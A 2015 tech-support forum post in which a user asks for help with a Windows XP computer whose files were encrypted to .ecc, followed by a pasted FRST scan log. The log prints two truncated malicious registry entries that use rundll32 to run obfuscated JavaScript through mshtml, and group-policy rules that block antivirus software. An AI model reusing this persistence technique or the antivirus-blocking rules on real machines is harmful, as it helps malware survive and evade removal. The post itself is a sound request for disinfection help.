Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Encrypted files (.ecc), malware removal help needed


  • This topic is locked This topic is locked
3 replies to this topic

#1 sportsfroma2

sportsfroma2

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Local time:02:36 AM

Posted 14 March 2015 - 12:24 PM

Hello!
 
My friend has a Windows XP Computer that has been infected with malware.
 
Brought it over to me as he didn't know where to go (not too technical or patient).
 
It looks like all his documents now have the .ecc extension, last modify date on these files is 2/24/15.
 
Looks like he was running MSE, which is disabled now, and part of his own troubleshooting steps involved installing AVG to try to remove it....  Looking through the AVG logs, the thread it identified was:
Trojan Horse MSIL7.WDF .
 
I also see Malwarebytes on his computer, and when I try running it from the Administrator account (which is the only account I have logged into so far, there is another account or two) I get the following error:
"Windows cannot open this program because it has been prevented by a software restriction policy."
 
I have not yet connected his computer to a network yet as I don't want to make things worse if possible, although if you think it would help I can certainly do so. I do have other computers available (am typing form my own computer right now)
 
I ran FRST off a flash drive, and have included the information as requested.
 
Thank you for all your help and for taking the time to look at this!
 
 
frst.tx:
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 11-03-2015
Ran by Administrator (administrator) on NICK on 14-03-2015 13:06:51
Running from F:\
Loaded Profiles: michelle coe & Administrator (Available profiles: michelle coe & Administrator)
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\PROGRA~1\AVG\AVG2015\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgcsrvx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgwdsvc.exe
(CrypKey (Canada) Ltd.) C:\WINDOWS\system32\Crypserv.exe
(Logitech Inc.) C:\Program Files\Common Files\LogiShrd\LVCOMSER\LVComSer.exe
(Logitech Inc.) C:\Program Files\Common Files\LogiShrd\LVMVFM\LVPrcSrv.exe
(NVIDIA Corporation) C:\WINDOWS\system32\nvsvc32.exe
() C:\WINDOWS\system32\PnkBstrA.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgnsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgemcx.exe
(Realtek Semiconductor Corp.) C:\WINDOWS\RTHDCPL.EXE
(Microsoft Corporation) C:\WINDOWS\system32\rundll32.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(ScanSoft, Inc.) C:\Program Files\ScanSoft\PaperPort\pptd40nt.exe
() C:\Program Files\Common Files\LogiShrd\LComMgr\Communications_Helper.exe
(Brother Industries, Ltd.) C:\Program Files\Brother\ControlCenter2\brctrcen.exe
(Synaptics, Inc.) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgui.exe
() C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\Viber.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Audiovox Electronics Corp.) C:\Documents and Settings\Administrator\My Documents\RCA Detective\RCADetective.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDCPL] => C:\WINDOWS\RTHDCPL.EXE [17881600 2009-08-09] (Realtek Semiconductor Corp.)
HKLM\...\Run: [NvCplDaemon] => RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
HKLM\...\Run: [nwiz] => nwiz.exe /install
HKLM\...\Run: [NvMediaCenter] => RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [SSBkgdUpdate] => C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe [155648 2003-10-14] (Scansoft, Inc.)
HKLM\...\Run: [PaperPort PTD] => C:\Program Files\ScanSoft\PaperPort\pptd40nt.exe [57393 2004-04-14] (ScanSoft, Inc.)
HKLM\...\Run: [IndexSearch] => C:\Program Files\ScanSoft\PaperPort\IndexSearch.exe [40960 2004-04-14] (ScanSoft, Inc.)
HKLM\...\Run: [LogitechCommunicationsManager] => C:\Program Files\Common Files\LogiShrd\LComMgr\Communications_Helper.exe [564496 2008-09-22] ()
HKLM\...\Run: [SetDefPrt] => C:\Program Files\Brother\Brmfl04g\BrStDvPt.exe [49152 2004-11-11] (Brother Industories, Ltd.)
HKLM\...\Run: [ControlCenter2.0] => C:\Program Files\Brother\ControlCenter2\brctrcen.exe [864256 2005-01-07] (Brother Industries, Ltd.)
HKLM\...\Run: [SynTPLpr] => C:\Program Files\Synaptics\SynTP\SynTPLpr.exe [98394 2008-12-03] (Synaptics, Inc.)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [688218 2008-12-03] (Synaptics, Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2014-12-19] (Adobe Systems Incorporated)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [948440 2013-10-23] (Microsoft Corporation)
HKLM\...\Run: [KernelFaultCheck] => %systemroot%\system32\dumprep 0 -k
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\AVG2015\avgui.exe [3710416 2015-02-19] (AVG Technologies CZ, s.r.o.)
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\SUPERAntiSpyware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Malwarebytes' Anti-Malware <====== ATTENTION
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"ijpyf8\..\mshtml,RunHTMLApplication ";eval(")odv!@buhwdYNckdbu)#VRbshqu/Rid (the data entry has 362 more characters). <==== ATTENTION!
HKLM\...99B7938DA9E4}\LocalServer32: [a] rundll32.exe javascript:"ijpyf8\..\mshtml,RunHTMLApplication ";eval(")odv!@buhwdYNckdbu)#VRbshqu/Rid (the data entry has 28512 more characters). <==== ATTENTION!
HKU\S-1-5-19\...\Policies\Explorer: [NoSMMyPictures] 1
HKU\S-1-5-20\...\Policies\Explorer: [NoSMMyPictures] 1
HKU\S-1-5-21-484763869-1604221776-1801674531-1004\...\Run: [Skype] => C:\Program Files\Skype\Phone\Skype.exe [31090272 2015-01-23] (Skype Technologies S.A.)
HKU\S-1-5-21-484763869-1604221776-1801674531-1004\...\Policies\Explorer: [NoSMMyPictures] 1
HKU\S-1-5-21-484763869-1604221776-1801674531-500\...\Run: [Steam] => E:\Program Files\Valve\Steam\steam.exe [2874048 2015-02-18] (Valve Corporation)
HKU\S-1-5-21-484763869-1604221776-1801674531-500\...\Run: [PCPerformer] => "C:\Program Files\PC Performer\PCPerformer.exe" /RUNSCAN
HKU\S-1-5-21-484763869-1604221776-1801674531-500\...\Run: [Viber] => C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\Viber.exe [936656 2014-10-20] ()
HKU\S-1-5-21-484763869-1604221776-1801674531-500\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\sspipes.scr [610304 2008-04-14] (Microsoft Corporation)
HKU\S-1-5-18\...\Run: [DWQueuedReporting] => C:\Program Files\Common Files\Microsoft Shared\DW\DWTRIG20.EXE [434080 2011-07-27] (Microsoft Corporation)
HKU\S-1-5-18\...\RunOnce: [_nltide_3] => rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N
HKU\S-1-5-18\...\Policies\Explorer: [NoSMMyPictures] 1
Startup: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\RCA Detective.lnk
ShortcutTarget: RCA Detective.lnk -> C:\Documents and Settings\Administrator\My Documents\RCA Detective\RCADetective.exe (Audiovox Electronics Corp.)
Startup: C:\Documents and Settings\michelle coe\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\WINDOWS\system32\AcSignIcon.dll (Autodesk, Inc.)
BootExecute: autocheck autochk * C:\PROGRA~1\AVG\AVG2015\avgrsx.exe /sync /restart

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-484763869-1604221776-1801674531-500\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSERT1
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,First Home Page = http://go.microsoft.com/fwlink/?LinkID=226786&Mkt=en-US&Src=MSERT&Tid=800325EB&OHP=http%3A%2F%2Fwww.google.com&OSP=
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSERT1
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,First Home Page = http://go.microsoft.com/fwlink/?LinkID=226786&Mkt=en-US&Src=MSERT&Tid=800325EB&OHP=http%3A%2F%2Fwww.google.com&OSP=
HKU\S-1-5-21-484763869-1604221776-1801674531-1004\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSERT1
HKU\S-1-5-21-484763869-1604221776-1801674531-500\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-484763869-1604221776-1801674531-500\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSERT1
HKU\S-1-5-21-484763869-1604221776-1801674531-500\Software\Microsoft\Internet Explorer\Main,First Home Page = http://go.microsoft.com/fwlink/?LinkID=226786&Mkt=en-US&Src=MSERT&Tid=800325EB&OHP=http%3A%2F%2Fwww.trovi.com%2F%3Fgd%3D%26ctid%3DCT3324416%26octid%3DEB_ORIGINAL_CTID%26ISID%3DM6E8017B3-0759-46E8-B817-861E7524FED6%26SearchSource%3D55%26CUI%3D%26UM%3D6%26UP%3DSP0E5D5DD2-4641-40D0-AE17-07D6A8146A08%26SSPV%3D&OSP=http%3A%2F%2Fwww.trovi.com%2FResults.aspx%3Fgd%3D%26ctid%3DCT3324416%26octid%3DEB_ORIGINAL_CTID%26ISID%3DM6E8017B3-0759-46E8-B817-861E7524FED6%26SearchSource%3D58%26CUI%3D%26UM%3D6%26UP%3DSP0E5D5DD2-4641-40D0-AE17-07D6A8146A08%26q%3D{searchTerms}%26SSPV%3D
URLSearchHook: HKU\S-1-5-21-484763869-1604221776-1801674531-1004 - YTNavAssistPlugin Class - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - C:\Program Files\Yahoo!\Companion\Installs\cpn6\yt.dll (Yahoo! Inc.)
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-1004 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-1004 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-1004 -> {7F54C3DA-FBDF-4CAD-8D92-C33C95D5A8F3} URL = http://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=b2ie7
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-1004 -> {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL =
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-500 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-500 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-500 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-500 -> {6246045F-68F7-4336-B903-93F466D2AB35} URL = http://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=b2ie7
BHO: Speed Test -> {319A461D-5202-4578-9EDC-CA35B9C0B561} -> C:\Program Files\Speed Test\ScriptHost.dll [2014-09-07] (BestOffers)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} ->  No File
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} ->  No File
BHO: SingleInstance Class -> {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} -> C:\Program Files\Yahoo!\Companion\Installs\cpn1\YTSingleInstance.dll [2010-03-23] (Yahoo! Inc)
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1249879274671
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\xpnfs4wb.default-1392871144062
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-22] ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\WINDOWS\system32\Adobe\Director\np32dsw.dll [2009-07-31] (Adobe Systems, Inc.)
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin: @java.com/DTPlugin,version=1.6.0_37 -> C:\WINDOWS\system32\npdeployJava1.dll No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-04] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-04] (Google Inc.)
FF Plugin: @videolan.org/vlc,version=1.0.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2009-07-26] (the VideoLAN Team)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-08-05] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npFoxitReaderPlugin.dll [2009-08-10] (Foxit Software Company)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL [2006-10-26] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2014-08-05] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np_gp.dll [2010-03-29] (NOS Microsystems Ltd.)
FF SearchPlugin: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\xpnfs4wb.default-1392871144062\searchplugins\trovi-search.xml [2014-11-15]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-09]

Chrome:
=======
CHR HomePage: Default -> www.salineschools.org
CHR StartupUrls: Default -> "hxxp://www.trovi.com/?gd=&ctid=CT3324416&octid=EB_ORIGINAL_CTID&ISID=M6E8017B3-0759-46E8-B817-861E7524FED6&SearchSource=55&CUI=&UM=6&UP=SP0E5D5DD2-4641-40D0-AE17-07D6A8146A08&SSPV="
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
CHR Profile: C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\agoenciogemlojlhccbcpcfflicgnaak [2014-09-28]
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-04-21]
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-04-21]
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-02]
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-07-01]
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-07-01]
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-21]
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-07-01]
CHR HKLM\...\Chrome\Extension: [dnhmdikhcjjeafcdfchklpfpaoamdjjd] - C:\Documents and Settings\Administrator\Local Settings\Application Data\CRE\dnhmdikhcjjeafcdfchklpfpaoamdjjd.crx [Not Found]
CHR HKU\S-1-5-21-484763869-1604221776-1801674531-500\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dnhmdikhcjjeafcdfchklpfpaoamdjjd] - C:\Documents and Settings\Administrator\Local Settings\Application Data\CRE\dnhmdikhcjjeafcdfchklpfpaoamdjjd.crx [Not Found]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVGIDSAgent; C:\Program Files\AVG\AVG2015\avgidsagent.exe [3411408 2015-02-19] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2015\avgwdsvc.exe [308720 2015-02-19] (AVG Technologies CZ, s.r.o.)
R2 Crypkey License; C:\WINDOWS\system32\crypserv.exe [122880 2008-05-07] (CrypKey (Canada) Ltd.) [File not signed]
S3 getPlusHelper; C:\Program Files\NOS\bin\getPlus_Helper.dll [68000 2010-03-29] (NOS Microsystems Ltd.)
R2 LVCOMSer; C:\Program Files\Common Files\LogiShrd\LVCOMSER\LVComSer.exe [186904 2008-09-22] (Logitech Inc.)
S2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22208 2013-10-23] (Microsoft Corporation)
R2 PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [66872 2009-12-28] ()
S2 x10nets; C:\Program Files\Common Files\X10\Common\X10nets.exe [20480 2001-11-12] (X10) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 A2DDA; C:\EEK\RUN\a2ddax86.sys [22056 2014-03-07] (Emsisoft GmbH)
S3 Ambfilt; C:\WINDOWS\System32\drivers\Ambfilt.sys [1684736 2009-08-09] (Creative)
R1 Avgdiskx; C:\WINDOWS\System32\DRIVERS\avgdiskx.sys [121624 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriverl; C:\WINDOWS\System32\DRIVERS\avgidsdriverlx.sys [202208 2015-02-19] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\WINDOWS\System32\DRIVERS\avgidshx.sys [154904 2014-11-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\WINDOWS\System32\DRIVERS\avgidsshimx.sys [21272 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\WINDOWS\System32\DRIVERS\avgldx86.sys [192792 2014-08-28] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\WINDOWS\System32\DRIVERS\avglogx.sys [265184 2015-02-03] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\WINDOWS\System32\DRIVERS\avgmfx86.sys [107488 2015-01-23] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\WINDOWS\System32\DRIVERS\avgrkx86.sys [27416 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\WINDOWS\System32\DRIVERS\avgtdix.sys [210400 2015-01-16] (AVG Technologies CZ, s.r.o.)
S3 BrScnUsb; C:\WINDOWS\System32\Drivers\BrScnUsb.sys [15295 2004-10-15] (Brother Industries Ltd.)
S3 CCDECODE; C:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-14] (Microsoft Corporation)
S3 cleanhlp; C:\EEK\Run\cleanhlp32.sys [50200 2014-03-07] (Emsisoft GmbH)
S3 FilterService; C:\WINDOWS\System32\DRIVERS\lvuvcflt.sys [23832 2008-05-20] (Logitech Inc.)
S3 gfiark; C:\WINDOWS\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)
S3 gfiutil; C:\WINDOWS\System32\drivers\gfiutil.sys [24040 2013-09-04] (ThreatTrack Security)
R3 LVPr2Mon; C:\WINDOWS\System32\DRIVERS\LVPr2Mon.sys [25624 2008-09-22] ()
S3 LVUSBSta; C:\WINDOWS\System32\drivers\LVUSBSta.sys [41752 2008-05-20] (Logitech Inc.)
S3 Monfilt; C:\WINDOWS\System32\drivers\Monfilt.sys [1389056 2009-08-09] (Creative Technology Ltd.)
R0 MpFilter; C:\WINDOWS\System32\DRIVERS\MpFilter.sys [214696 2013-09-27] (Microsoft Corporation)
S3 NdisIP; C:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-14] (Microsoft Corporation)
R1 NetworkX; C:\WINDOWS\system32\ckldrv.sys [19584 2008-03-17] () [File not signed]
S3 SCT_SKMScan; C:\WINDOWS\System32\drivers\sct_skmscan.sys [33096 2012-10-12] (Sophos Limited)
S3 usbbus; C:\WINDOWS\System32\DRIVERS\lgusbbus.sys [12416 2007-07-23] (LG Electronics Inc.)
S3 UsbDiag; C:\WINDOWS\System32\DRIVERS\lgusbdiag.sys [19840 2007-07-23] (LG Electronics Inc.)
S3 USBModem; C:\WINDOWS\System32\DRIVERS\lgusbmodem.sys [21632 2007-07-23] (LG Electronics Inc.)
S3 XUIF; C:\WINDOWS\System32\Drivers\x10ufx2.sys [17792 2005-05-19] (X10 Wireless Technology, Inc.)
S3 catchme; \??\C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\catchme.sys [X]
S1 exgjfwiw; \??\C:\WINDOWS\system32\drivers\exgjfwiw.sys [X]
S3 rt2870; system32\DRIVERS\rt2870.sys [X]
S1 SABKUTIL; \??\C:\Program Files\SUPERAntiSpyware\SABKUTIL.sys [X]
U3 TrueSight; \??\C:\WINDOWS\system32\TrueSight.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-03-14 13:06 - 2015-03-14 13:06 - 00000000 ____D () C:\FRST
2015-03-07 18:57 - 2015-03-07 18:58 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2015-03-02 19:01 - 2015-03-02 19:01 - 00000000 ____D () C:\Documents and Settings\michelle coe\Local Settings\Application Data\Avg2015
2015-03-02 19:01 - 2015-03-02 19:01 - 00000000 ____D () C:\Documents and Settings\michelle coe\Application Data\AVG2015
2015-03-02 18:52 - 2015-03-02 18:53 - 00000000 ____D () C:\Documents and Settings\Administrator\Application Data\SmartDraw
2015-03-02 15:54 - 2015-03-02 15:54 - 00000221 _____ () C:\Documents and Settings\Administrator\Desktop\Call of Duty Modern Warfare 2.url
2015-03-02 15:54 - 2015-03-02 15:54 - 00000221 _____ () C:\Documents and Settings\Administrator\Desktop\Call of Duty Modern Warfare 2 - Multiplayer.url
2015-03-01 14:46 - 2015-03-01 14:46 - 00000000 ____D () C:\Documents and Settings\Administrator\Application Data\AVG2015
2015-03-01 14:44 - 2015-03-01 14:44 - 00000702 _____ () C:\Documents and Settings\All Users\Desktop\AVG 2015.lnk
2015-03-01 14:44 - 2015-03-01 14:44 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\AVG
2015-03-01 14:44 - 2015-03-01 14:44 - 00000000 ____D () C:\Documents and Settings\Administrator\Application Data\TuneUp Software
2015-03-01 14:43 - 2015-03-01 14:45 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\AVG2015
2015-03-01 14:43 - 2015-03-01 14:43 - 00000000 ___HD () C:\$AVG
2015-03-01 14:41 - 2015-03-01 14:41 - 00000000 ____D () C:\Program Files\AVG
2015-03-01 14:30 - 2015-03-01 15:15 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Avg2015
2015-03-01 14:30 - 2015-03-01 14:30 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\MFAData
2015-03-01 12:59 - 2015-03-01 12:59 - 00000105 _____ () C:\Documents and Settings\Administrator\Application Data\mbam.context.scan
2015-02-25 21:10 - 2015-03-01 19:47 - 00073505 _____ () C:\WINDOWS\iis6.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00038178 _____ () C:\WINDOWS\FaxSetup.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00035419 _____ () C:\WINDOWS\ocgen.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00026504 _____ () C:\WINDOWS\tsoc.log
